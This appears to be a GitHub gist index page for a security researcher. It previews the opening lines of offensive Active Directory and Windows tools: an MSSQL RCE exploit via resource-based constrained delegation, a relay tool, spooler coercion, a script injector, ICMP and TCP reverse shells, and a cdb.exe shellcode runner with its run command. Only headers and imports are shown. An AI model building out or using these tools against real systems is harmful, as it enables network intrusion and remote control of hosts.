Matt Bush 3xocyte

  • The Missing Link
  • Melbourne, Australia
@3xocyte
3xocyte / adidns_records.py
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
View adidns_records.py
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
@3xocyte
3xocyte / bad_sequel.py
Last active Oct 11, 2019
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
View bad_sequel.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@3xocyte
3xocyte / rbcd_relay.py
Last active Nov 1, 2019
PoC resource-based constrained delegation relay attack tool
View rbcd_relay.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct
@3xocyte
3xocyte / resolve_domain_computers.py
Last active Oct 15, 2019
get /etc/hosts entries for computers in Active Directory
View resolve_domain_computers.py
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@3xocyte
3xocyte / create_machine_account.py
Last active Nov 22, 2019
simple script for experimenting with machine account creation
View create_machine_account.py
#!/usr/bin/env python
import argparse
import sys
import string
import random
# https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain
# create machine account utility by @3xocyte
# with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
@3xocyte
3xocyte / dementor.py
Last active Nov 27, 2019
rough PoC to connect to spoolss to elicit machine account authentication
View dementor.py
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@3xocyte
3xocyte / scriptinjector.cs
Last active Oct 6, 2018
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
View scriptinjector.cs
using System;
using System.IO;
using System.Text;
using System.Linq;
using System.Collections.Generic;
// ephemeral script injector by @3xocyte
// takes a target directory to watch, and an OS command to attempt to inject into any scripts that get modified
namespace FileContentInjector
@3xocyte
3xocyte / icmpshell.cs
Created Aug 13, 2018
ICMP reverse shell (icmpsh compatible)
View icmpshell.cs
using System;
using System.IO;
using System.Text;
using System.Net.NetworkInformation;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Threading;
using System.Collections.ObjectModel;
// .NET ICMP reverse shell client with PowerShell runspace by @3xocyte
@3xocyte
3xocyte / tcpshell.cs
Last active Aug 13, 2018
Reverse TCP shell with PS runspace
View tcpshell.cs
using System;
using System.Text;
using System.Net.Sockets;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Diagnostics;
// reverse TCP shell with powershell runspace
// by @3xocyte
@3xocyte
3xocyte / sc-cdb.py
Last active Sep 3, 2019
shellcode to cdb.exe
View sc-cdb.py
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
src = open('shellcode', 'r')
sc = src.read()
src.close()
copy = ";eb @$t0+"